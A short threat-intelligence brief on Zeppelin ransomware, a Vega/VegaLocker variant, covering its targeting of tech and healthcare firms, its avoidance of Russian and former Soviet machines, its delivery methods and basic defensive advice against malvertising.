Russia: Zeppelin is the newest member of the Delphi-based Ransomware-as-a-Service (RaaS) family initially known as Vega or VegaLocker. The biggest difference between Zeppelin and its predecessors is the attack campaigns. Previous campaigns utilizing Vega were spread to Russian-speaking users, with a focus on those in accounting, through a widespread malvertising campaign. The binaries were typically signed with valid certificates and hosted on GitHub. In this most recent campaign, Zeppelin has been targeting a select handful of tech and healthcare companies in Europe and the United States. Unlike its predecessor Vega, Zeppelin binaries are designed to stop running if it detects that it is running on a machine based in Russia or any former Soviet states. Zeppelin is capable of being deployed as a .exe, a DLL, or placed in a PowerShell loader. Zeppelin was found to be hosted on watering-hole websites, except for PowerShell variants which were hosted on Pastebin. Researchers currently believe that at least some of the attacks were conducted through Managed Security Service Providers (MSSPs) but gave no further details of how they came to that conclusion.
Analyst Notes
With the significant shift in tactics for this campaign versus campaigns utilizing Zeppelin’s predecessor, Vega, it is likely that Zeppelin is being leveraged by different threat actors. The fact that this variant has been specifically designed to avoid organizations in Russia and former Soviet states further supports the idea that a different group is behind Zeppelin’s operation. Such a shift in the operation of ransomware is another example of how important it is for security personnel to be fluid in their monitoring and response to threats. Malvertising is a technique used by threat actors to use the same targeting services that are normally used to deliver targeted ads—instead of simply showing a marketing message, these ads embed malicious code that is delivered alongside non-malicious content in websites that the targeted people are likely to visit. The best protection against malvertising is to keep web browsers up-to-date and disable plug-ins such as Java and Flash so they don’t run in the web browser. Further information on how Zeppelin operates can be found at https://threatvector.cylance.com/en_us/home/zeppelin-russian-ransomware-targets-high-profile-users-in-the-us-and-europe.html
